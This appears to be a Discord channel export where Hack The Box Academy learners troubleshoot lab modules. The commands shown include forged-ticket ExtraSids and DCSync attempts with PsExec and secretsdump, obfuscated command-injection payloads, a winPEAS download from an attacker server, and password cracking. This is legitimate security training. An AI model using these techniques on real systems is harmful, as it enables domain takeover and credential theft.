
check DM

hi guys im trying to solve the AD enumeration and attacks module

and im connected to a host via SSH.
im trying to clone kerbrute from github but i get this message.
Cloning into 'kerbrute'...
fatal: unable to access 'https://github.com/ropnop/kerbrute.git/': Could not resolve host: github.com

help please

it is normal htb target machines dont have internet connection

you should have kerbrute on your attack host (vm or pwnbox)

Given the capture file st /tmp/capture.pcap, what tcpdump command will enable you to read from the capture and show the output contents in hex and ascii?

“-rX ~/tmp/capture.pcap” and its wrong

Hi chat, in *Coercing Attacks & Unconstrained Delegation *of the Windows Attacks & Defense module, do you know where can i find the Coerce executable to run the Coerce command ? I ran a locate and a find on both my home and the /usr/share/. but no sign of it.

nvm

hi. i dont have permission to send messages in the general chat

maybe i used the link from the academy thats why ? or no ?

Go to #welcome follow the provided steps to verify your account and you should obtain access to more channels, including #general. It is also worth reading over the #rules and #faq

thanks

sorry to bother but it says to contact an admin because the verification failed

Sorry I am not an admin, I am just a dude playing a dude disguised as another dude. On the serious side, I've seen this before, let me try to find that and see what answer was given.

ok

I found the post. Let me see if I can find someone online that can help.

I've been slowly working on the "Using the Metasploit Framework" project. I'm currently focusing on sessions and jobs, but I'm getting an error. I did some research, and everything I'm finding suggests that the target is either not vulnerable or has already been patched. Am I missing something, or did I do something wrong?

Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Pi-Hole version 0 is ≥ 5.3 and not vulnerable "set ForceExploit true
to override check result.

You can send me a DM

Hi! Im in Skills Assessment of Password Attacks: I get initial foothold with the username b*** and the password given. After that I found the credentials of user h*** and pivot to J01. Then, the only thing I could think of was to use Snuffler, and it says I have access to FILES01, but when I try to get there from my host (I pivoted with ligolo), it tells me I don't have access.
I can't figure out how to get to the SMB of files01. Can anyone give me a clue?

Since it sounds like you can authenticate to the internal hosts, I'd take the time to enumerate the various types of access you can authenticate with.

I am confused

Infronto network traffic analysis

Interrogating network traffic with capture and display filter

what do i even do to answer the questions i dont see any file or anything

OHHH THE REAOURCES IM DUMB NVM

Thanks! This clue works for me!

how can I add color to text in sysreptor report...chatgpt is not helping

if I wan to turn this code red...
  

Color it with the blood of your enemies

And good luck on your report

Im stuck again. I found access to SMB in DC, but i dont found any interesting. I also tried accessing FILE01 with evil-winrm using h** and b** users, but I can't access it. I see the shares of FILE01 but i cant connect.

BRO

I recommend revisiting this section Credential Hunting in Network Shares

This is the kind of stuff i never get to learn

Because companies dont have Discord

They only have Active Directory and Azure

And GCP

This channel is for modules content. Feel free to move your discussion to #general

Contact discord support and refrain from discussing this any further in this channel. If your post was deleted, it was because it doesn't pertain to any HTB academy modules.

@lyric beacon As @cunning canopy said this is not the server for that. We do not condone illegal activity.

It doesn't let me say anything in general

@eternal night You need to verify your account, follow the instructions in #welcome

Oh ok

Thanks

Now, yes... I had forgotten how to connect to a Share from Windows LOL. Thank you!

hi i want to ask in password attacks skill assesment do i need at the first username-anarchy ?

Can u share resources

I mean aside common phishing techniques

In the Active Directory Enumeration & Attacks module and Attacking Domain Trusts - Child -> Parent Trusts - from Linux section, why is the IP of child domain provided when we have to attack from linux attackhost which is connected to the internal subnet that contains the domains. Also, it states SSH into the child domain whereas there is no ssh port open there. Thanks.

It says to ssh into the attacker machine

for the module "Automating Payloads & Delivery with Metasploit" the question says to Authenticate to 10.129.69.251 (ACADEMY-SHELLS-WIN10MSF) with user "htb-student" and password "HTB_@cademy_stdnt!"
tried to ssh but it doesnt work, how should i go anout doing this?

network issue

rightt cuz its windows...

thkss a lot

I know, but please read after that. Also, what's the purpose of giving IP for the child domain.

somehow it still doesnt work

You have no text after "it states ssh into the child domain" -- it doesn't it says ssh into the attacker machine.

Wrap the password in single quotes

i did in the 2nd command

can you ping the target

yes

It doesn't say that directly, but after comma why is that line written?

Not sure what that has to do with anything i said

Are you using the pwnbox at the same time as the VPN?

I see, I'm looking at the page now. Did you complete the 1st question?

yes

So you have a shell then. What's the issue finding the answer to the 2nd question?

tried using pwnbox only but still unable to restarting instance now to retry

i just looked at the resource above to answer haha

If you use the pwnbox and vpn at the same time you'll have network issues because they share the same IP. The first question requires obtaining a system shell. From there you can get the 2nd question's answer

I clearly understand what you're saying (I have already solved the question) but you're not telling me the reason for providing the child domain IP separately and the part which I shared in the screenshot above. Thanks.

The IP is provided so it makes it easier so you don't have to find it yourself? not sure

i am currently using only pwnbox but still same issue

It looks network related to me. Maybe try resetting everything and starting fresh.

Could also try changing servers or regions if need be

Okk lemme try

If we have use the attackbox as stated in the question, that's because it's dual-homed and the domains are in the internal subnet 172.16.5.x.

Yes I know that, what's your point

The reason for separately providing the child domain IP as seen in the screenshot.

Not sure what you're asking or getting at here. Your question originally was "why does it give us the IP", for convenience. your 2nd question was "ssh into the child domain but i can't" but I explained it doesn't say that, it says to ssh into the attacker box. Am I misunderstanding something here?

It doesn't make sense to give it for convenience when we have to perform it using the attackbox. Secondly, I was referring to the line after comma, that what does it indicate.

If they did not provide the IP, you would have to scan for it. Just because the system is connected to another subnet doesn't mean you know the IP of the DC. Not sure what you mean with your 2nd question please rephrase

the line after the comma is the IP of DC02

If it was for convenience, then they forgot to provide the IP of DC01, the parent domain that we need to compromise ultimately. This is the confusion I seek clarification for. Thanks for your help by the way, appreciate it.

hi! please help with module https://academy.hackthebox.com/module/143/section/1457

I'm going through the material again, checking various exploitation methods after receiving a parent domain ticket.

so, I managed to get a ticket and execute ls \\...\c$. then I try to configure DCSync using mimikatz, specifying the precision of the command in the module, and I get an error.

how to fix the problem?

I don't know the answer sorry

Read the last part of the section

No worries, thanks again.

hahaha)) I specified the parent domain in the command before, but for some reason it didn't work. thanks!))

I can try to request the command line through PsExec using my ticket. I read in the Internet that it should work like that. But it doesn't let me in. same thing, I can't do Enter-PSSession. that is, I can only do DCSync?

Idk. Looks like you made the user yourself, so they'll have perms to whatever you gave them

I didn't create the user, it's a non-existent hacker user, for ExtraSids Attack

In next module, I see using psexec.py

https://academy.hackthebox.com/module/143/section/1508

but I can't use flags -k -no-pass in Windows version)

I think it's just that Impacket’s psexec.py uses a different method of execution that relies on SMB access (which you have), not SCM rights (which your forged ticket lacks).

great point!

I thought so too and found psexec from impaket: https://github.com/maaaaz/impacket-examples-windows

I tried to execute the following command

.\psexec.exe LOGISTICS.INLANEFREIGHT.LOCAL/hacker@acad...t.local -k -no-pass -target-ip 172.16.5.5

I get the error

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

I want, as in the next module, to get an interactive shell from Windows on the parent domain controller using the received ticket, at least somehow: .\PsExec (PsTools) or .\PsExec (Impachet) or Enter-PSSession ...

I’d say specify the FQDN and shuffle it around if all params are already correct.
Make sure that the user your authenticating as actually exists on the box if you have a way to.

hi @knotty granite !

I am trying to perform ExtraSids Attack from module https://academy.hackthebox.com/module/143/section/1457. on the following page https://academy.hackthebox.com/module/143/section/1508, when attacking from Linux, psexec from Impacket is used. There is a non-existent user hacker used there

# PsExec (PsTools)
.\PsExec.exe \\academy-ea-dc01.inlanefreight.local -u LOGISTICS\hacker cmd.exe
.\PsExec.exe \\academy-ea-dc01.inlanefreight.local cmd /c "whoami /all"

# PsExec (Impacket)
.\psexec.exe  \\academy-ea-dc01.inlanefreight.local
.\psexec.exe LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5

# Enter-PSSession (Powershell)
Enter-PSSession -ComputerName academy-ea-dc01.inlanefreight.local

in all cases i failed. the ticket is valid, I can success do ls \\academy-ea-dc01.inlanefreight.local\c$

the goal is simple - get an interactive shell on the parent domain controller from Windows host, using ticket, got after ExtraSids Attack

Ok I did a bit of studying but I’ll continue after this of course

What I think is maybe you should switch up your tool to remote to the box. If you got a golden ticket or what not via ExtraSids attack (an attack I’ve never heard of nor seen executed) and it’s valid, then try other tools to remote as your target user.

Any ideas on what tools can be used?

Evil-winrm and psexec (via Linux) were the first two things in mind while looking at your case

Guys I have an issue in the bash script module

GNU nano 8.4 log.sh
#!/bin/bash

var="8dm7KsjU28B7v621Jls"
value="ERmFRMVZ0U2paTlJYTkxDZz09Cg"

for i in {1..40}
do
var=$(echo $var | base64)

            #<---- If condition here:

if [[ $var == $value ]]
then
echo "Var is equal to value"
else
echo "Var isn't equal to value"
fi
if [[ ${#var} -gt 113450 ]]
then
echo -n "$var" | tail -c 20
else
:
fi
done

This is my script for the Comparison Operators exercise what can I modify it ?

So what’s the real issue like the output and stuff and the goal?
I recommend removing the : at this part

else
:
fi
done

It provides me a value but htb says it isn't the right answer

Well the script can be improved that’s one thing I do know because I never done this module but I’ll try to help as best as I can

Add quotes to the variables that are in your if conditions

Maybe also try printing out your variables when saying “var isn’t equal to value”

you wrote that you have never heard of such an attack? what is it called then? it is an attack on the parent domain, the SID history is forged. I took the name of the attack from the training materials

https://academy.hackthebox.com/module/143/section/1457

Oh no it’s a real attack. My apologies for the confusion. What I meant was I’ve never like seen anything like it because lack of experience. It’s new to me which makes me want to learn it.

I’m not doing that module nor have I done it therefore I am not a knower.

okay

I came across a similar question on the htb forum, the person also received a TGT ticket and was unable to execute PsExec. It would be good to have such a skill in own arsenal, since in complex networks it may not always be possible to perform terminal from own Linux host

https://forum.hackthebox.com/t/ad-trusts-modules-psexec-access-is-denied/312552

yeesss

I finally succeeded. I don't know what happened, but I succeeded.

How did you achieve it? Share please.

I was able to connect to the interactive shell through PsExec (PsTools). Before executing the command, it is better to refresh TGT once again

.\PsExec64.exe \\academy-ea-dc01.inlanefreight.local cmd.exe
.\PsExec64.exe \\academy-ea-dc01.inlanefreight.local -s cmd.exe
.\PsExec64.exe \\academy-ea-dc01.inlanefreight.local -s cmd /c "whoami /all"

failed to connect via PSSession. at the moment, it seems to me, the problem is in the infrastructure settings. here I found an example where in the same situation the connection is successful https://academy.hackthebox.com/module/253/section/2812

Here is the explanation I found for myself in this problem. but I am not sure if it is correct:

The fake TGT that was received has a PAC, but the SID may not map correctly on the target host for WinRM, so WinRM refuses to create a PowerShell session with the error

I have now a test laboratory from the CRTA certification, and active academy infra from the OSCP, as well as two examples from HTB. all labs on the topic AD Trust (attack parrent DC from child). so the research is still ongoing))

That's awesome, keep us updated. Thanks.

okay

Skills Assessment - Password Attacks
aftert username anarchy how to pivot ?

bro you are working as a pentester?

a little)

I think its not good channel to talk here, i have to ask something...dm will be fine?

Ummm

I have done that assessment

But i dont remember exactly

You can dm me

Guys, I tried since 1 hour to get the flag on the Firewall IDS/IPS medium labs, and just checked the solution, and even using the command provided it doesn't show the flag ! How is this possible ?
Section link https://academy.hackthebox.com/module/19/section/118

I am having some issues SSH'ing into windows machines, found on the trust attacks modules. The first windows machine i.e. the SQL01 one is fine to ssh into, but all others no matter through proxychains or ligolo only allow a certain amount of lines then will repeat output on the last line, so i cant ready ANY command output as its just immediately replaced with the next line, and finally just the prompt for c:\tools or wherever im at. I find what i'm having to do is remotely execute reverse shells on each one back through my ligolo listener, but this is tedious and from time to time i ctrl+c on the wrong window and lose my listener chain. Does anyone have any solution to the SSH issue?

I think I remember running into that issue and used the Pwnbox which didn't have the problem. I could be remembering a different thing than you're working on though because I don't remember the specific module.

Thats what it looks like, I don't have to want to use pwnbox its already slow enough from Australia

Yeah the pwnbox should do it. I remember trying to log the output of the command but it was messed up too, but you could try that.

rather chain revshells tbh

for the cpts exam would you recommend doing it on the pwnbox or on your own vm?

vm

there are interesting updates😄

I'm looking at another infrastructure, the exploitation of ExtraSids Attack is different a little. I exploit it from Linux, and there I can't create a valid TGT token through a non-existent user. The writeup says that I need to use an existing user and his id. And also specify the parameter -groups 516 -user-id <real_id_of_real_user>. Also in the parameter -extra-sid I need to add this to the sid for Enterprise Admins: ,S-1-5-9

I don't understand why this is so. Any ideas?

why?

better experience, tools already available, etc

Hey i have a question, i had a 44 weeks streak and i lost them this week due to traveling conditions is there anyway support can return them back ??

No probably not. Only support can answer, but I highly doubt they can/will do it.

Can i give it a try they might understand

Nothing stopping you from trying

can someone please tell me how to add coloured text in code segment in the report via sysreptor....

No, we can't

Anyone got a minute for https://academy.hackthebox.com/module/112/section/1078 Footprinting Easy ? This first assessment is considerably more different than what we've done thus far.

Ive got some screenshots to share with where im at and what im a little iffy on

nvm im dumb

nvm no im not. im only half dumb if someone HAS done the box i'd like to understand how it was expected of us to make a leap in logic that i eventually got to, to find the box...

Hit me up

or do they just purposely leave a breadcrumb but its like half ass-ish?

I continue testing that otherinfra. In general, it turned out that in the attack it is necessary to specify a real username, and also add a parameter with userid. Otherwise, the attack is identical

In the material on HTB it is written that the user name can be specified randomly. As it seems to me, this does not always work like that

That's interesting, I have no clue on that actually too.

Im seriously confused by this module idk what im doing wrong, anyone open to help out,

Like a valid user must exist in the domain for the attack to work. In HTB, it's mentioned the user doesn't even has to exist.

There must be at least one user in the domain. I have never seen a domain without users) But for an attack, maybe with special settings, you need to specify an existing username

Maybe some extra validations are in place on PAC by the DC which doesn't let a non-existent account forge TGT. Just my opinion though.

Is there anyone I can ask about the API Attacks Module "Broken Object Property Level Authorization" Area. I'm going crazy.

Cheers!

In the module "pentesting in a nutshell" -> Section "Windows System enumeration" I've now tried several times to get the winpeas.ps1 file from my atacking machine onto the windows target machine via RDP + powershell (as provided in the course). but the actual "get"-command (or its windows equivalent)seems to fail constantly. Does anyone else experience this? 🙂

Sorry for late ping but what type of shell where you using on the virtual host to run the PsExece64 executable?
And could your prior errors be because you were missing key arguments and such?
Congratulations on solving the problem 🛜

more likely

Can you show an example of the error message

hey i am doing the vulnerability assessment module, i have the openVPN running the academy regular. once i connect to the greenbone security assistant through firefox i have a about 2 minutes and then it disconnects me, this makes running the assignment a drag

is this a hackthebox server issue thing ??

I don't remember anymore) the problem was solved partly. In fact, I can't execute evil-winrm, netexec, etc, with generated tgt. it's not a big problem because I can make dcsync from linux, and can make psexec from linux with generated tgt

maybe you know what the problem is😄

no error, the python-server evven shows the status code 200 :D. on the target machine the ps-command simply takes forever. IF i mispell the file, it instantly provides the problem, but if I do it correctly, its stuck. I've tried pwnbox AND VPN (with kali linux in this case):

Hi

Try with the following, instead of invoking it as an expression:

C:\> iwr -uri http://10.10.14.200:8080/winPEAS.ps1 -o winpeas.ps1
C:\> . .\winpeas.ps1

Can someone give me role so i can write in #general i need support help related to billing and my account

this worked right away

(well, to be fair: I still cannot get the System Information section....maybe thats a hint towards the root of my initial problem?

@urban sage @surreal rain help please

Reach out to support via the website, the discord server is not meant to assist with billing related inquiries

I did, site says something went wrong

When i try to contact

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Is it just me or a pivoting module requires the honorable mention of ligolo? I have finished some tasks without extra steps provided in the module because ligolo is like VPN, not HTTPs or anything

When you guys pipx install a python tool, and that tool needs root privileges to execute, do you guys just create an alias that calls sudo with the absolute path of the binary instead of installing the tool in the roots local bin PATH AND the user's local bin that you are using? Or maybe there is even a solution for this problem that I am unaware of? The only reason I ask is because putting my user's local bin in root's PATH seems like it would be a security concern and double downloading the tool to both also seems like a poor idea for management later.

Oh well, as long as your were able to make it work is all that matters. I’ll try to figure out what went wrong in my meantime if I can because that attack method is pretty rare in Active Directory as far as I know.
I’ll go study it…

So I did some of these a couple of times and some times the SSH connection worked great and other times it didn't. My way around the times it didn't was to use the SSH creds to enable RDP on DC02 and then just RDP'd into it and used PS. Maybe that can help. If you have any questions about it, feel free to DM.

That's a good idea, I think I'm past it now but thankyou

in the step-by-step solution it says that winpeas should be able to provide this section (in contrast to systeminfo ), but as you can see on my screenshot, the system-info section on winpeas is also not showing 😄

Are you trying to save the file to the disk or run it in-memory? Also, you're already in powershell so no need to write powershell in the command.

I have (successfully) "downloaded" the ps1-script to a writeable folder on the target machine (simply in accordance with the modules guide)

so I'm nont sure how to answer your first question 😄

As for your second remark: I also wondered about this, but check the modules textline:

this has the issue, right? Already being in powershell but still explicitly using the "powershell" command

hi everyone
I'm trying to add a script to zap to use it in fuzzer, but it doesn't work
if I run fuzzer with a custom script, the progress bar just doesn't move and stays at 0%
can you tell me if there are any special conditions for the script?
here's my script:

import base64
def processPayload(value):
    b64 = base64.b64encode(value.encode('utf-8'))
    return b64.hex()

and secod question:
I don't really understand the third task in Skills Assessment - Using Web Proxies
I made a script that substitutes the last character in cookies, encrypts and sends, but the response from the server is the same everywhere
how do I know that I have selected the correct cookie?

It simply spawns another PowerShell, executes winPEAS.ps1 directly from the attacker’s HTTP server, and save whatever output it prints to winpeas.txt. That's what it's doing essentially.

If you review the file winpeas.txt, you'll see the result of the script winPEAS.ps1.

ah, thanks for the explanation 🙂 It seems THAT did not work out too well. BUT i think this explains the very long runtime / waiting time. maybe i need to wait 5-10 minutes for the "donwload" to finish. BUT the fact that "system information" cannot be gathered by winPEAS doesnt change, right?^^"

im currently on Linux Fundamentals : User Management were it teaches about creating users and such, it's telling me to test this out on the target system, but the "htb-student" user cant use sudo? and dose not have perms to create users? am i missing something? every time i try its just telling me that i'm now reported haha. help.

I don’t think they want you to create a user on the machine unless they’re like asking for a flag or an answer to a question.

Try it in your own personal machine maybe?

I have these questions, but i guess i can solve them without messing around in the terminal. I'm not really comfortable to be messing around with perms on my PC yet. Thanks for your answer tho.

https://academy.hackthebox.com/module/77/section/852

In this module, do I have to hunt for a listing IP or can i use port 9443

Just bought the silver 🥈 annual...

you can use any port on your system provided it's not already bound to some service

How would I find those ports?

netstat -a

Thank you!

I am looking for some help in Active Directory Penetration Tester Path: Windows Lateral Movement - Skill assessment - Q2. Found the DC but still can't get into Arturo account.

anyone here did/is doing Linux Fundamentals module?

File Transfer module, wsgidav usage, I managed to figure out I could just request the exact file I wanted in the exact folder I specify using powershell, but I was never able to actually make the shell command dir \\<attacker-IP>\DavWWWRoot work like they explained in the module. I keep getting the Network path was not found error. Same with copy even if I specify the exact location without DavWWWRoot copy \\<attacker-IP>\testfile.txt I know connections can be made because this syntax to get the file works perfectly with Invoke-WebRequest on powershell. What am I missing?

Hi Chat, in PKI - ESC1, of Windows Attacks & Defense, how are you copy pasting the certificate ? I tried both using vim or nano to create the cert.pem file with the output of the certify command (with both the certificate and the key), then i parse it with sed, then use openssl to transform it in an cert.pfx. But when i use rubeus with the cert.pdf i get a "KDC_ERR_PADATA_TYPE_NOSUPP" error instead of "you did it you beautiful"

You can DM me if you don’t get it figured out and I can help in a bit

Hey Guys,
Someone knows how to go through this skills assessment: https://academy.hackthebox.com/module/297/section/3421
It's stating there's no need to connect through SSH, but I couldn't find any link to the web application.
Thank you for your help

anyone else having trouble doing rdp? I get this error

yo guys im on AD enum, attacking domain trusts child->parent from linux (aka golden ticket)

ive forged a ticket with the enterprise admin's SID passed as SID history parameter using ticketer.py

and now i want to dump nt hash from the bross user

im using this

└──╼ $secretsdump.py inlanefreight.local/yosef@172.16.5.240 -k -no-pass -just-dc-user bross
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[*] Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up... 

but i think im doing something wrong

i also can get a shell using psexec.py

still stuck here. here's another ss

hey team, I'm just now learning about eyewitness in the modules, from my understanding it's limited to application discovery, how do you guys use it?

Is the Code box broken?

Your VM is separate from your PC and doesn't affect your host. You can create a snapshot, mess around and revert to it, because you can't really create users or add them to groups on the pwnbox.

I see, I will have too learn how to create a VM after i have completed the Linux Fundamentals

this i believe is a tls problem..how are you connecting to the RDP

yea, i have done it

this does not require you to test the commands, going through the man page is enough

pwnbox horribly slow no ?

Anyone for an extremely gentles nudge on https://academy.hackthebox.com/module/112/section/1079 Footprinting medium lab? I have what I need im just unable to make use of it ?

using xfreerdp and pawnbox in the browser. This was working last week

let me try in vm'

nono i need the command

yes xfreerdp from pwnbox in browser is slow this has mostly always been the case tho when ive used it

what command you are using..
ideally it should be something like
xfreerdp /u:htb-student /p:HTB_@cademy_stdnt! /v:10.129.151.78 /cert:ignore

xfreerdp /u:Administrator /p:"$$$$$$" /v:10.129.101.245

doesnt work in vm too

lemme try yours

i think cert ignore is important which probably you're missing because of which you're getting untrusted tls error

no luck

it says NLA failed now this is a differnet error than before if you notice, i would suggest just try to reset the target box and try again if not, ensure the correct passwords are being put..

Hello all i need some advice, I've completed my BBH path around 80%, and the modules being removed are remaining, as im planning to take CWSE exam, should i skip those and continue these modules?

New modules:

• Web Fuzzing
• API Attacks
• Attacking GraphQL
• Attacking Common Applications

Removed modules:

• Web Service & API Attacks
• Session Security
• Hacking WordPress

Hi, I was doing Advanced Command Obfuscation section of Command Injection module i am really stuck at this module. I've been trying to bypass it for a while. this is what i have done till now
i ran 127.0.0.1%0a{t'ai'l,index.php} which did return ?> means i have successfully bypassed t'ai'l similarly g're'p .only thing left was to bypass | , HTB mentions that use <<< instead of | this is what i did
ip=127.0.0.1%0at'ai'l%09<<<$(g're'p%09"input"%09index.php) it was fine until here but when i run to command below to test a nested grep command it it is not displaying any output other than ping results ip=127.0.0.1%0at'ai'l%09<<<$(g're'p%09mysql<<<$(g're'p%09"input"%09index.php)) i also tried with "$(g're'p%09mysql<<<"$(g're'p%09"input"%09index.php)")" please help me if i am missing something obvious or if i am on a wrong path

your password is wrong

im doing an assessment right now and i have one user who works just fine xfreerdp, trying a different and password fails

likely because ih ave the wrong password, im getting an ssl cert error

so im in the HTB setting up process, exploring the terminal emulator and i am using wavelength (or rather on that section) i go to open bashrc and the file doesnt exist nor will it let me source or create one?

any help would be so much appreciated, extremely new to this

still looking for a lil nudge on https://academy.hackthebox.com/module/112/section/1079 im all in the weeds here.

Not familiar with the module so do you need access to the .bashrc file for the module or is it optional?

optional 🙂 just trying to wrap my head around all of this (this is going to be my future) lol

and i am trying to understand just about everything i can before i start school in october

Anyone know a module with airgeddon

Need help With DACL Attacks II Skills Assessment Q3.

I have NTLM hashes for all users. Passwords for all users except t****i. I need a nudge in the right direction to get to the last flag, if any one has completed this.

Nevermind I managed to figure it out 😅

Wi-Fi Evil Twin Attacks has a section about airgeddon

Ty is that the only one?

the only one i know about. you can search Academy too

Well just know the bashrc file is just like a configuration script that sets environment variables and creates alias.

If it is optional in regards to the module then I wouldn’t bang my head on it so much. Just know that it’s not too important to understand unless it’s a requirement to the module or your interests.

understood! thank you @knotty granite

Does no one really have the answer to this? Genuinely DO NOT understand even remotely why it isnt working.

Guys please help me 😭 🙏

to my knowledge you cant reference UNC paths like that. i think you need to pushd (then popd when done)

ask chat gpt about the EOF marker and adding a line or something. You might be getting caught up with a nextra line somewhere i dont know this info to be of much more help but i was having problems any time i tried to use the ... whats it called here strings and heredocs

EOF terminator

I did ask chatgpt and claude @quiet trout

Hello everyone i on the footprinting module at the smtp part. I am using metasploit's smtp enumeration script with the file that is given in the resources. But i don't get any results and i don't get why

So this is under the SMB uploads section, should I be running both the SMB server from impacket AND the webDAV server so that when one fails to connect the other will connect?

can you dm me a screenshot?

link to the section you're on? I just did these yesterday

shoot me a dm with your screenshots im not sure i follow if you're doing this from linux terminal its gonna be different but you need to basically mount the shares if possible thats what pushd popd does (push a directory... map to drive letter)

sent it

https://academy.hackthebox.com/module/112/section/1072

i think i am doing the right thing but i get no results so i am confused

I didnt use metasploit for this i used purely uh openssl s_client i believe.

oh right to enum

i used the smtp-user-enum binary mentioned in the module

oh i will check that out then but i would think this would work too haha thanks anyway

its not working only for me?: " If we hover the mouse over the respective options, a small window will appear with an explanation. These explanations will also be found in other modules, which should help us if we are not yet familiar with one of the tools."

its easier. its described in the section and works the same

sorry i had the metasploit option missconfigured to the wrong word list

now i got it i am so sorry for wasting your time have a good one 😅

This question is still on the table if anyone else wants to give an attempt at answering it. Been stuck here all day.

My new best guess is that IEESC is configured on the target device, blocking outgoing http requests. I deduced this because it was also messing up my WebClient requests in powershell. If anyone can confirm this, let me know, otherwise im moving on

Hi, anyone who has completed the Skills Assessment - Password Attacks, I'm stuck near the end, I think, and I don't know what to do with the user stom.

Anyone who HAS the CPTS were the modules enough to prepare you?

absolutely

thanks

any order I should do the modules or just go with there order

go in order

i saw the last one was note taking though

seems odd

no, the last one is AEN which is the capstone. the 2nd to last is documentation and reporting, which is about how to write up a report and document findings, not about note taking

you're free to take them in any order you want, but some of the modules build off of previous knowledge

Hi! Can someone help me with the Advanced XSS and CSRF Exploitation Skills Assessment? I am stuck with File Upload, I am moderator

Active Directory Enumeration & Attacks : DCSync
Scenario Setup

In this section, we will move back and forth between a Windows and Linux attack host as we work through the various examples. You can spawn the hosts for this section at the end of this section and RDP into the MS01 Windows attack host with the credentials htb-student:Academy_student_AD!. For the portion of this section that requires interaction from a Linux host (secretsdump.py) you can open a PowerShell console on MS01 and SSH to 172.16.5.225 with the credentials htb-student:HTB_@cademy_stdnt!. This could also likely be done all from Windows using a version of secretsdump.exe compiled for Windows as there are several GitHub repos of the Impacket toolkit compiled for Windows, or you can do that as a side challenge.

password wrong idk why

I am new on this. Recommend where to start. Basics for a beginner

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

.

Reason why General is inaccessible for new users?

It's accessible but you need to follow the instructions in #welcome to gain access.

Cheers will take a look 👍🏻

.

Hmm account sign up, will look later 👀

I don't speak much English

Language?

French

Comment va votre soirée?

English only please

ah ok no problem

Also this isn't #general, this channel is for discussion of the modules on Academy. Please take the general convo there.

Have this real time translator im trying out, thought I'd test a new language. Haha lol, haven't sorted my general out 😉. I get you though 👌🏻, you guys have a nice evening

Anyone for a quick sanity check on https://academy.hackthebox.com/module/112/section/1080

Footprinting lab -hard

I have a question why can't I use the VIP machines, and I have the VIP plan?

You'd have to ask support on the website, no support is provided on Discord

All good, but those guys aren't answering.

Hey! currently doing the Job Role path in preparation for the exam, I am currently doing the skill assessment within "Attacking Common Services" however I really struggled with the "easy" one and even needed a peek at the solution. It is kinda demotivating to me that I still can't do an easy skill assessment without needing a nudge. Any advice?

not much other than its "normal" and "ok"

Take a look instead at what youre missing from the solution

My major contention with the annual writeups is they dont generally lead you to discover the solution

A -> C while not showing B

Methodology is probably the key most thing for learning

i rdp to

Active Directory Enumeration & Attacks : DCSync
i rdp to the MS01 and sSSH to 172.16.5.225 with the credentials htb-student:HTB_@cademy_stdnt! but i get pass wrong

so i think the problem in HTB hosts setup

How are you trying to paste? In powershell, paste is just ctrl+v

yes CTRL + v

if u see in the pic i test the paste of the password

i also update my vpn config + downlaod new one . reset the machine and try again but same problem

Try a different vpn region?

ok

not work

i will use windows impacket compiled bins as alternative so no need for linux host

Which module are you working in?

pivoting using a socks proxy when config the burp using that proxy . proxy >> setting proxy >> connection >> socks

use ligolo-ng for better

And when you have 4/5 host? In different subnets? How you can manage it?

mm i will send u my notes .

dm

I'm officially almost giving up on the sliver module

Hey, was away from my computer for the weekend. Yes, I am! Could I DM?

rip to masoudredteamer

Super et vous

keep it english

I don't speak English 😓

Hahaha Anglais please, upsets the mods. Good to hear though man

It's in the #rules ; this is a primarily english server

Hence me saying it causes upset lol. I'm a rule abiding member

Anyone up to help with a little nudge on Foot printing lab hard

https://academy.hackthebox.com/module/112/section/1080

I'm at the finish line here just cant seem to get there

nvm i was stuck on stupid i had all i needed it was just organized in a manner to throw me off

What do you need?

i finally got it

did you get yourws sorted?

Can anyone help me with Password Attacks John The Ripper second question

john --wordlist=/usr/share/wordlists/rockyou.txt hash 
Loaded 2 password hashes with no different salts (LM [DES 128/128 SSE2])
Warning: poor OpenMP scalability for this hash type, consider --fork=12
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 100% 0g/s 6870Kp/s 6870Kc/s 13741KC/s (JESTER..*7¡V
Session completed

This is what I get as a response
Using the format also does not help

john --wordlist=/usr/share/wordlists/rockyou.txt --format=ripemd-128 hash 
Unknown ciphertext format name requested

the hash file contains the given hash:
193069ceb0461e1d40d216e32c79c704

The Unknown ciphertext format name requested error indicates an issue with the --format option. ripemd-128 normally should work. You can check the ripemd formats your john supports by using john --list=formats | tr , '\n' | grep ripemd. If there is no ripemd-128 or if it is under a different name, there could be a version problem. I'm just guessing though

Can you give me some advice, I'm going through the SQL Injection Fundamentals | reading files module, I got to the test task, but I don't understand what actions are required of me there.

We see in the above PHP code that '$conn' is not defined, so it must be imported using the PHP include command. Check the imported page to obtain the database password.